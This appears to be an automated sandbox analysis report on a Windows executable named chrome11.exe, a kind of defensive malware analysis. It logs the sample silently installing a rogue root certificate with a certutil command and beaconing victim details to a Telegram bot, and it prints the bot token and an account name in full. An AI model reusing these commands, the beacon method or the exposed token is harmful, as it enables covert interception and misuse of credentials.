                                              Preview:0....0...*.H........$.....0.0...*.H........$.....0...0.....*.H............0...0(..*.H.......0....X....^.../p....W.........{"6.C.+&.O}p.6/...|.h..6@..0...3.bGu...8.K./...`../G.c=.K.?!.W5.......4.0n._m.W&S..@....._..|/.P1[..b.....W.....5Wn.J....u.K..$.'N..b!.*2[[...#.4..i....J.B.zh.[......K....B!...".ZN..9.b9...u2.........d(.:...&m].a.{...M....9.Aq......'.].;. ..*.....?..........n\....r.8.$..8s3.D..$..Z.$..d...).....(=...A....3..<Oth.U..3.2......h\...p........6...^j..W..9..Q....w.a.O*.y........W|G...}.I......x...uPz.=)..J{/..\..2..3.`.....{>..YLa..f..#..Q...~..q.Ge..+. ..\.b.......p.ao...+XK`.0 a<,.*.*#....$.Z.U./i..i..r.P....y$a..C.r...s...d.<gg..t..G.j...s......^xz... |...P;'........"g..s.....m......Cb..$..Jw....}..(....f..X'............S..:.Q..(.8h..X.s....eg".....A.M...r..A.....q.G9.....Y..i.L.......r"...j...4...........N....S...Mp...wz...3...#]y./....5..6...F...R.\..J.U[=.)L.O?.t!.mKH..[.B0.!..z ....P.&... .=`..).b..U...k./T.?o..[`.@..q..{.
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2658
                                              Entropy (8bit):7.811119298420234
                                              Encrypted:false
                                              SSDEEP:48:nnArXVreBH80lixBZJCQf+7fwlHXSMgX569wKQSCo6MAyr9HgFjRSjKCtnkFcs:CV6JGAQf4fyuX58sSjAY9AFjEtkFD
                                              MD5:3BF5559EF415515627C12373C98C7B28
                                              SHA1:A79DAB1CE7B5B2EB37A41E4B88F4BA6D6FA21980
                                              SHA-256:D5D93E716731B92E0B191A114466B25B49477A77F415FD405F6CFEFF72520F18
                                              SHA-512:69E28B014EC7A63B1F3D7C396EA5AF5C169B50A28F077305AF0F968BAA9913AE65020DFA68EFD6EDD3B0CA421549DC3FB7F8E6497A8732DB825AEB2C964E4D00
                                              Malicious:false
                                              Preview:0..^...0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0......I...........;.....*..rJ.\.|Cm.=5/.(.f....].o52..X.b.......v..y.YY...]...o#..X.P...vT.||..... .H.....B.....>\Wr'e..D.o..G.....f.M....'..w...Q4..A>.n..o<.G..o.%.W.=x)*...NTf.W2m.x.uY...l.....S...U.p%.TD1.I.<.p.IY....Q.3.....c.....S...............5.d.....E.g..9.]3.!.O+......]s.U.S...I!>..6.../g..L...O;....y..u....E..-..9`...7..c.qQ...e._m.x.+O.'...:...F.s...l.7.6.tc.m...x..+u.Gk...Dw.CE2.....x#t!.....j.6..k.L..|L..S...I..c.%\.O..R...}.&..9].....%Xq....hz?.u`9...L.z..D.s"..|.@..}..*|...m...W......6..._q9..iE.=(..!..s.?.....i.....,.r......7_./T..+x....}K.>.|...'.P.{....d..y...]\HT|.=...../6.T..v bOd..........\n.o.R..!.....i>....2.Cm..x...........+w..;S..~>U....+...fgTR./..3..E..\=.U...B....{......N..J..j^.d......<.[~.....#...W..Q..M...K.4.`.Z8....(..).8.j6[<...u.pF........d..M......a......2\{.+S..d...x.{....wB..!...I....|d.......r..I.r...q,.....e...
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2658
                                              Entropy (8bit):7.813376685244186
                                              Encrypted:false
                                              SSDEEP:48:nnArNHICqJxBa3FkwWcYZpopVsKrUEnNwK1kcTwIAI+b8xlUSFCBahLGuCeuMHeb:io7RwE8pVsKIEnNuFIAI+b9SFCBsK9Me
                                              MD5:DD770865AF71B1E882CE2C73FC8AA491
                                              SHA1:64334BBD91A859E1A476A0909AB75E84C3636D5E
                                              SHA-256:46DEBC020B75D393F2A3F7F03941FA6F59049B65EE8B0D7C85CB984AAB097DD0
                                              SHA-512:9E8C4FD839050810D459432F173E4548CB8078B9CBA71F88AAD3FDAA1B54022280277349B32CF052B64FACF2FC064EC4D5A29E2536AD40B715D201B71987CC77
                                              Malicious:false
                                              Preview:0..^...0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0....)D...%a.........C.....^.o.*r:.]...i..q../...h^...sf...t........x.9.....~F.>.=..n...h,U[[..".........Vu...4.J-.,..G.....*t.f|f.-...|...}...vv\......!;$.....0~Y.m...w.....s.Sp...@`....p75.Rg.....LT...#*]..!.........Z9..J. .].^.o.p..%....c.._.;dS.\.d....2.@`.)..\zs+|Yg.?..."...V..J \...g.5....3..u*I...H.,.Y.#.a..s....W%.hC.\.........}...0......pFRt.}.Ix(.C.QQq..S..6h..S0h.....`.......s]...b..n..?\...]}..W.d...q0J..>..f.6...>j....!R..L......!.d.-..IF..D.o..#.#....l.F..8....y.n....Fi.QL.~r~..C.M.I.TU....{."H..L.#..o2D...OF...).].v.`=....S.....T..H.$..$.$K.........P...R{qE.fsF.k.T.j......9....R.9...N/........`.".......xb.(....>...>t[.?.-X...[.V>..;.s.....T#z0.....b......seJ)..0..qGCG.o..b.....w._N.....k.9....8..D=.)..Y..p.Rd.-$?...@........q#....R:...%}..E'.-.B...r.]..s...kTm.A[:...v.....]b{c.....r.#..p....H..N.b......q....j6.S:p....'h.#
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.5804621997271013
                                              Encrypted:false
                                              SSDEEP:3:i+mRQfjTNn:i+nft
                                              MD5:4E442A2A1061BEFB2EE92026988090D0
                                              SHA1:9B0D1A56078EE5B4E34AB815694186DD0F64032C
                                              SHA-256:A8615CC54A31B966663B7852F48C4D4467B855438D54257ED97150655AF2550D
                                              SHA-512:3784BC0332CCCB1015268670312C803AB7AF3A3226A22A2344A6318C8064D7F6DE45BA27DFC953D27ABBB4E74C13709139FCAEC2EC52CEE7AD407E72356D49DB
                                              Malicious:false
                                              Preview:965543_EC:F4:BB:45:F6:9D..
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2251
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:0158FE9CEAD91D1B027B795984737614
                                              SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                              SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                              SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1154
                                              Entropy (8bit):6.700974602219491
                                              Encrypted:false
                                              SSDEEP:24:6XoyXoOOd5wr2mgd4/7EaEAFvzVLivHHCeBmJ7f9n7JDo:Jy4Jd5w9geTEg4HJsJzp7JDo
                                              MD5:29CB125A258144050FED28E2654F029A
                                              SHA1:141721638597D704CC7E71FE41663A38E398E8FB
                                              SHA-256:908A4A4F2CB9015DF33D45D0E07187DA2A3124FEBCC4EB675A068291F1D2889B
                                              SHA-512:8335FCE36D62847B55BE44F93F4B838B77A8BB64335878357864216DF179ADF04BAFB5E584B837D01085B4ADDFCC6472C952191258C8415A0015F849228988A0
                                              Malicious:false
                                              Preview:........H...T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.......................PC..a..R.&.............wp!:........m..(.................l.......................C.N.=.T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.....M.i.c.r.o.s.o.f.t. .E.n.h.a.n.c.e.d. .C.r.y.p.t.o.g.r.a.p.h.i.c. .P.r.o.v.i.d.e.r. .v.1...0..... ...........0...0............e.i;0...*.H........0.1,0*..U...#Titanium Root Certificate Authority0...231218122606Z..270323122606Z0.1,0*..U...#Titanium Root Certificate Authority0.."0...*.H.............0............k...p/1...p.LcH.1=..s.\..K.9......#..%.R...2[(.1.4.X...v,..F..&?.F....[.AOuC^..o))."....;.V..UF.........Hk..$.).}....t.......q.8r.;..|S.!..o..82tR..Q..a<....S(i..`...4.7.}E......3.\F.Da.....^v.......f|.&&.!L...d...4....'&..@.:"p...Wma.......(0&0...U.%..0...+.......0...U.......0....0...*.H............."W..u=..*.k....;k2..sL....X.+..4?}.uZx@.&.DK..0D...T^.-[!.G.4.(...-....I...H#.G..19....?\V_....
                                              Process:C:\Users\user\Desktop\chrome11.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):248
                                              Entropy (8bit):3.3392597611628227
                                              Encrypted:false
                                              SSDEEP:6:+Pk/DMyla8IKx0/ByD+G6sLnA0A2om0im:+P2zKCUB5G66A0gma
                                              MD5:748D77AD8ABE8D505A0D73CA42C935B6
                                              SHA1:EFB324A6281F00405B263C99161CCCFE1771CED0
                                              SHA-256:77D23734B8ED9285A556058686589EDDC0C055F9CE192033C59009EFAC6FF722
                                              SHA-512:9440B126851E387085C5432E24851F557737437745D0A0B275459251D7ABF5B27002E054159EC13DBB0C39139BB0612D8835D660BB8E5F69AF9DB2F7BD626DD8
                                              Malicious:false
                                              Preview:................l.......................C.N.=.T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.....M.i.c.r.o.s.o.f.t. .E.n.h.a.n.c.e.d. .C.r.y.p.t.o.g.r.a.p.h.i.c. .P.r.o.v.i.d.e.r. .v.1...0.....#...................PC..a..R.&.
                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.902097026291253
                                              TrID:
                                              • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                              • Win64 Executable GUI (202006/5) 44.25%
                                              • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                              • Win64 Executable (generic) (12005/4) 2.63%
                                              • Generic Win/DOS Executable (2004/3) 0.44%
                                              File name:chrome11.exe
                                              File size:4'767'744 bytes
                                              MD5:5b39766f490f17925defaee5de2f9861
                                              SHA1:9c89f2951c255117eb3eebcd61dbecf019a4c186
                                              SHA256:de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
                                              SHA512:d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf
                                              SSDEEP:98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
                                              TLSH:E926E5B4FAA4DA33D16A9271416B531053A4BFD7A33293471B7C325E898A7881F311FB
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`................................
                                              Icon Hash:173149cccc490307
                                              Entrypoint:0x87fb8e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6756FEF4 [Mon Dec 9 14:30:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [0087FB9Ch]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              jo 00007FBC50B595ADh
                                              inc edi
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add ah, dh
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x47fb380x54.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4800000xdcd6.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x48e0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x47fbac0x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x47fb9c0x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x47dc150x47de005ceedc658c5649b95f964ce02f43eef1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x4800000xdcd60xde000d0799c709de77ebfcd7a616870053c0False0.733618384009009data7.300073276108226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x48e0000xc0x200bce9ae23dfbc6572d8209a860e0b2fe8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x4802680x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4913294797687861
                                              RT_ICON0x4807d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46435018050541516
                                              RT_ICON0x4810780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.39072494669509594
                                              RT_ICON0x481f200x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6214539007092199
                                              RT_ICON0x4823880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4298780487804878
                                              RT_ICON0x4834300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.32863070539419087
                                              RT_ICON0x4859d80x7cfcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9984998124765596
                                              RT_GROUP_ICON0x48d6d40x68data0.7019230769230769
                                              RT_VERSION0x48d73c0x3b0data0.4046610169491525
                                              RT_MANIFEST0x48daec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 18, 2024 12:46:37.401339054 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:37.401401997 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:37.401468992 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:37.429431915 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:37.429457903 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:38.857660055 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:38.857736111 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:38.861005068 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:38.861017942 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:38.861331940 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:38.915697098 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:38.942833900 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:38.987329006 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:39.333859921 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:39.333880901 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:39.475855112 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:39.525068045 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:39.803384066 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:39.803533077 CET44349707149.154.167.220192.168.2.9
                                              Dec 18, 2024 12:46:39.803591013 CET49707443192.168.2.9149.154.167.220
                                              Dec 18, 2024 12:46:39.819338083 CET49707443192.168.2.9149.154.167.220
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 18, 2024 12:46:37.249243975 CET5125453192.168.2.91.1.1.1
                                              Dec 18, 2024 12:46:37.386552095 CET53512541.1.1.1192.168.2.9
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 18, 2024 12:46:37.249243975 CET192.168.2.91.1.1.10xc859Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 18, 2024 12:46:37.386552095 CET1.1.1.1192.168.2.90xc859No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              • api.telegram.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.949707149.154.167.2204437636C:\Users\user\Desktop\chrome11.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 11:46:38 UTC217OUTPOST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1
                                              Content-Type: application/json; charset=utf-8
                                              Host: api.telegram.org
                                              Content-Length: 95
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-12-18 11:46:39 UTC95OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 37 31 30 35 37 30 39 38 31 33 22 2c 22 74 65 78 74 22 3a 22 53 79 73 74 65 6d 20 4e 61 6d 65 3a 20 39 36 35 35 34 33 0d 0a 4e 65 77 20 6c 61 70 74 6f 70 20 64 65 74 65 63 74 65 64 20 72 75 6e 6e 69 6e 67 20 74 68 65 20 70 72 6f 67 72 61 6d 21 22 7d
                                              Data Ascii: {"chat_id":"7105709813","text":"System Name: 965543New laptop detected running the program!"}
                                              2024-12-18 11:46:39 UTC25INHTTP/1.1 100 Continue
                                              2024-12-18 11:46:39 UTC722INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Wed, 18 Dec 2024 11:46:39 GMT
                                              Content-Type: application/json
                                              Content-Length: 334
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":3619,"from":{"id":7587476277,"is_bot":true,"first_name":"calliebot","username":"callie_thrubot"},"chat":{"id":7105709813,"first_name":"Maik","last_name":"Fleischer","username":"MaikFleischer","type":"private"},"date":1734522399,"text":"System Name: 965543\nNew laptop detected running the program!"}}


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:06:46:35
                                              Start date:18/12/2024
                                              Path:C:\Users\user\Desktop\chrome11.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\chrome11.exe"
                                              Imagebase:0x1d22e7a0000
                                              File size:4'767'744 bytes
                                              MD5 hash:5B39766F490F17925DEFAEE5DE2F9861
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:06:46:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\certutil.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"
                                              Imagebase:0x7ff766530000
                                              File size:1'651'712 bytes
                                              MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:4
                                              Start time:06:46:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff70f010000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:16.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 19426 7ff887c0abd2 19427 7ff887c0abff InternetSetOptionA 19426->19427 19429 7ff887c0ac96 19427->19429
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0WR$r6H
                                                • API String ID: 0-85033063
                                                • Opcode ID: f51e3fb351974b0d189241b58de828b4e7652ae9a89762d2e7fa5ab58dd864b3
                                                • Instruction ID: 8c769d5ef1d87bbd8bd2a284066c71637caf40849e042c8a1cb85762e2b90d08
                                                • Opcode Fuzzy Hash: f51e3fb351974b0d189241b58de828b4e7652ae9a89762d2e7fa5ab58dd864b3
                                                • Instruction Fuzzy Hash: 09B1B070918A8D8FDB85DF28C8556ED7BF1FF58310F4502AAE819CB292DB38E915CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b248d4f6af2bf9ac4e39465283e76fe815ef18dbdf0266fc991f82b3317f1dd1
                                                • Instruction ID: dfb8ccd3b09755fb70db50ac6262cfd7c2cd15598c89a6f5bf1bea33e7a2fa26
                                                • Opcode Fuzzy Hash: b248d4f6af2bf9ac4e39465283e76fe815ef18dbdf0266fc991f82b3317f1dd1
                                                • Instruction Fuzzy Hash: E4126F30A0965DCFEB95EB68D851BACBBB1FF4A340F5401B9D00DD7292CA39AD85CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e3d2193bf001e4787153f33e8ac984f46d563820e7ded84257dd4ce0c91b0a7
                                                • Instruction ID: f231215bf63c33806574c059bb122caf58f466d4acf985bf5664e44327a9af68
                                                • Opcode Fuzzy Hash: 4e3d2193bf001e4787153f33e8ac984f46d563820e7ded84257dd4ce0c91b0a7
                                                • Instruction Fuzzy Hash: 8FE1B230908A4E8FEBA8DF28D8557ED77E2FB55350F04426AD84DC7291DE78A944CBC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 741a9621e434dc554c853060db66e667a77834985a683a83b11bda7cd01f50f2
                                                • Instruction ID: 8967b4cdee9adc28016fe85347cac423d7973f4c8de098c5629b1a1252a49fde
                                                • Opcode Fuzzy Hash: 741a9621e434dc554c853060db66e667a77834985a683a83b11bda7cd01f50f2
                                                • Instruction Fuzzy Hash: F151E03194AA8A9FEB46DB64D8157FD7BB1FF07380F1400BEC049DB1A2CA2D5949CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 862b9d1ce78d83756e0309bbea805dde804f82a929f56eca1009b19c8b639d89
                                                • Instruction ID: 2fa698ae7c04cc2a0ce064d39435e90f485c08011fe78ea4ef18aca260d93e97
                                                • Opcode Fuzzy Hash: 862b9d1ce78d83756e0309bbea805dde804f82a929f56eca1009b19c8b639d89
                                                • Instruction Fuzzy Hash: 3D61CB71D4D65A8FEB55DBA8D8916FCBBB2FF15340F14007ED009EB282DA39A941CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45bceea65e6fc3052996fe4c59fdd65646c3ffbbd433d58048efa3f3c6bf32f6
                                                • Instruction ID: a47c9e788b01f86f78719c580c8626e9fbdad2226e702b2b7245203737439b1f
                                                • Opcode Fuzzy Hash: 45bceea65e6fc3052996fe4c59fdd65646c3ffbbd433d58048efa3f3c6bf32f6
                                                • Instruction Fuzzy Hash: F7513B30E18A5DCFEB89EFA8D4556ACBBB1FF5A344F5400AAC00DE7292CA345885CB01

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 7ff887df5a79-7ff887df5a93 1 7ff887df5ab9-7ff887df5ac3 0->1 2 7ff887df5a95-7ff887df5aa0 1->2 3 7ff887df5ac5-7ff887df5ace 1->3 4 7ff887df5aa7-7ff887df5ab6 2->4 5 7ff887df5aa2 2->5 6 7ff887df5ad4-7ff887df5ae0 3->6 7 7ff887df5b99-7ff887df5ba6 3->7 4->1 5->4 6->7 9 7ff887df5ae6-7ff887df5b36 6->9 10 7ff887df5b72-7ff887df5b77 7->10 11 7ff887df5ba8-7ff887df5bb9 7->11 14 7ff887df5b8a-7ff887df5b94 9->14 20 7ff887df5b78-7ff887df5b87 10->20 13 7ff887df5bbc-7ff887df5bc5 11->13 18 7ff887df5c90-7ff887df5c9d 13->18 19 7ff887df5bcb-7ff887df5bd7 13->19 16 7ff887df5b96-7ff887df5b97 14->16 17 7ff887df5b38-7ff887df5b54 14->17 16->13 23 7ff887df5b56 17->23 24 7ff887df5b5b-7ff887df5b71 17->24 25 7ff887df5c9f-7ff887df5cb0 18->25 26 7ff887df5c68 18->26 19->18 22 7ff887df5bdd-7ff887df5c2d 19->22 20->14 31 7ff887df5c81-7ff887df5c8b 22->31 23->24 24->10 24->20 30 7ff887df5cb3-7ff887df5d94 25->30 28 7ff887df5c6f-7ff887df5c7e 26->28 29 7ff887df5c6a 26->29 28->31 29->28 41 7ff887df5f9f-7ff887df5fa5 30->41 32 7ff887df5c2f-7ff887df5c4b 31->32 33 7ff887df5c8d-7ff887df5c8e 31->33 35 7ff887df5c52-7ff887df5c65 32->35 36 7ff887df5c4d 32->36 33->30 35->26 36->35 42 7ff887df5fab-7ff887df5fb6 41->42 43 7ff887df5d99-7ff887df5e18 41->43 50 7ff887df5e70-7ff887df5e7b 43->50 51 7ff887df5e7d-7ff887df5e83 50->51 52 7ff887df5e1a-7ff887df5e6d 50->52 53 7ff887df5ecf-7ff887df5ed9 51->53 52->50 55 7ff887df5e85-7ff887df5e99 53->55 56 7ff887df5edb-7ff887df5ee1 53->56 57 7ff887df5ea0-7ff887df5eb6 55->57 58 7ff887df5e9b 55->58 59 7ff887df5f0c-7ff887df5f1f 56->59 64 7ff887df5ebd-7ff887df5ecc 57->64 65 7ff887df5eb8 57->65 58->57 62 7ff887df5ee3-7ff887df5efc call 7ff887df3870 59->62 63 7ff887df5f21-7ff887df5f29 59->63 69 7ff887df5f01-7ff887df5f09 62->69 66 7ff887df5f6b-7ff887df5f90 63->66 67 7ff887df5f2b-7ff887df5f69 63->67 64->53 65->64 72 7ff887df5f97-7ff887df5f9c 66->72 67->72 69->59 72->41
                                                Strings
                                                Memory Dump Source
